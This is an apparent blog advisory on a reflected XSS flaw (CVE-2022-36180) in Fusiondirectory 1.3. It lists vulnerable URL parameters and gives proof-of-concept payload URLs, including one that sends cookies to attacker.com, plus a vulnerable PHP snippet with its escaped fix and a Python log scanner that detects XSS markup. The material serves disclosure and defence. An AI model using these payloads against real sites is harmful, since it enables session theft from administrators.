---
Fusiondirectory is a popular open-source web-based directory management solution, often used atop OpenLDAP. In September 2022, a serious security vulnerability — CVE-2022-36180 — was publicly disclosed. This issue affects version 1.3 and allows attackers to perform Cross Site Scripting (XSS) attacks against users by injecting malicious code into the message and plug parameters in the URL.
In this post, we'll walk through the vulnerability, demonstrate it with a proof of concept, and provide resources for mitigation.
What is CVE-2022-36180?
CVE-2022-36180 is a reflected XSS vulnerability in Fusiondirectory 1.3. By manipulating URL parameters, an attacker can inject arbitrary JavaScript code that runs in the victim's browser. The vulnerable parameters are message and plug, often used in:
- /fusiondirectory/index.php?message=[injection]
- /fusiondirectory/index.php?message=invalidparameter&plug=[injection]
- /fusiondirectory/index.php?signout=1&message=[injection]&plug=106
Whenever these parameters are rendered without proper escaping or sanitization, the page is open to an XSS attack.
Why is this Dangerous?
If an attacker convinces an authenticated user (like an admin) to click on a malicious link — even unintentionally — their browser will execute the attacker’s script. This could:
- Perform actions using the victim’s privileges
No special permissions are needed — just a crafted link and a user to click it.
Proof of Concept (PoC)
If the message parameter content gets injected into the page without sanitization, here’s a basic attack scenario:
https://example.com/fusiondirectory/index.php?message=<script>alert('XSS')</script>
When visited, the browser will display an alert pop-up, demonstrating code execution.
Similarly, you can inject into the plug parameter:
https://example.com/fusiondirectory/index.php?message=invalidparameter&plug=<script>alert('XSS')</script>
Or chaining parameters during signout:
https://example.com/fusiondirectory/index.php?signout=1&message=<img%20src=x%20onerror=alert('XSS-3')>&plug=106
Replace the alert with a call to your own server to exfiltrate cookies:
https://example.com/fusiondirectory/index.php?message=<script>fetch('https://attacker.com/?c='+document.cookie)</script>
If you inspect the PHP backend in Fusiondirectory 1.3, you may see code like:
<?php
$message = $_GET['message'] ?? '';
echo "<div>$message</div>";
?>
If $message is not sanitized, arbitrary HTML and JavaScript pass straight to the browser.
Safer coding: *Always escape outputs!*
echo "<div>" . htmlspecialchars($message, ENT_QUOTES, 'UTF-8') . "</div>";
References and Resources
- Official CVE Record: CVE-2022-36180
- Original Disclosure:
  - huntr.dev GHSA-2rfx-rw2r-5fhv
  - huntr.dev report
- Upstream Issue: Fusiondirectory Issue #8838
Educate your users about phishing links.
Checking your logs for suspicious requests to /fusiondirectory/index.php is a good idea. Attackers often test XSS with <script>alert(1)</script> or <img src=x onerror=alert(1)>.
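One way to run the log check described above, as an added example that is not part of the original post or of Fusiondirectory itself: a Python scan that flags requests to /fusiondirectory/index.php whose message or plug values decode to markup, including double-encoded values. The combined access-log format, the three-round decoding depth and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

WATCHED_PARAMS = ("message", "plug")  # parameters named in the write-up above
# Markup indicators: a tag opener, an inline event handler, or a javascript: URI.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript\s*:", re.I)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %253Cimg is still seen as <img."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return the watched parameters whose values carry markup in one log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/fusiondirectory/index.php"):
        return []
    query = parse_qs(url.query, keep_blank_values=True)
    return [name for name in WATCHED_PARAMS
            if any(MARKUP.search(fully_decode(v)) for v in query.get(name, []))]

def scan(lines):
    """Return (line_number, flagged_parameters) for every suspicious line."""
    return [(n, hits) for n, line in enumerate(lines, 1)
            if (hits := suspicious_params(line))]

# Constructed sample entries (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2022:13:55:36 +0000] "GET /fusiondirectory/index.php?message=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2022:13:55:41 +0000] "GET /fusiondirectory/index.php?message=invalidparameter&plug=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 5131',
    '198.51.100.7 - - [10/Oct/2022:13:56:02 +0000] "GET /fusiondirectory/index.php?signout=1&message=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E&plug=106 HTTP/1.1" 200 5098',
    '192.0.2.44 - - [10/Oct/2022:13:57:10 +0000] "GET /fusiondirectory/index.php?signout=1&message=Session%20expired&plug=106 HTTP/1.1" 200 4977',
]

if __name__ == "__main__":
    for number, params in scan(SAMPLE_LOG):
        print(f"line {number}: markup in {', '.join(params)}")
```

A hit means the request carried markup in a reflected parameter, not that a script ran in anyone's browser; treat flagged lines as leads for review alongside the referrer and the session that followed the link.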
Conclusion
CVE-2022-36180 highlights a classic — but still threatening — XSS bug in a critical admin tool. Even one unescaped parameter is all it takes for an attacker to compromise an organization. Always validate and escape user input, especially in security-sensitive applications.
Timeline
Published on: 11/22/2022 01:15:00 UTC
Last modified on: 07/10/2023 16:15:00 UTC